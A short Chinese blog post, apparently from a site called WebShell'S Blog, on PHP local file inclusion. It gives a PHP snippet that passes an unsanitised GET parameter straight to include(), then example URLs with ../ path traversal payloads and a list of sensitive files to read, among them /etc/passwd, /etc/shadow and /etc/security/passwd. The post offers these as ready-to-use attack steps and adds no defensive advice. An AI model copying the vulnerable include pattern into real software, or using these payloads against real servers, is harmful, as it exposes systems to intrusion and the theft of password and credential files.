php伪造本地文件包含漏洞
代码:
<?php
$page=$_GET[page];
include($page.'php');
?>
你可以这样使用
https://www.webshell.cc/index.php?page=../etc/passwd
https://www.webshell.cc/index.php?page=../../../etc/passwd
https://www.webshell.cc/index.php?page=..../../etc/passwd
获取更多数据:
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/1969.html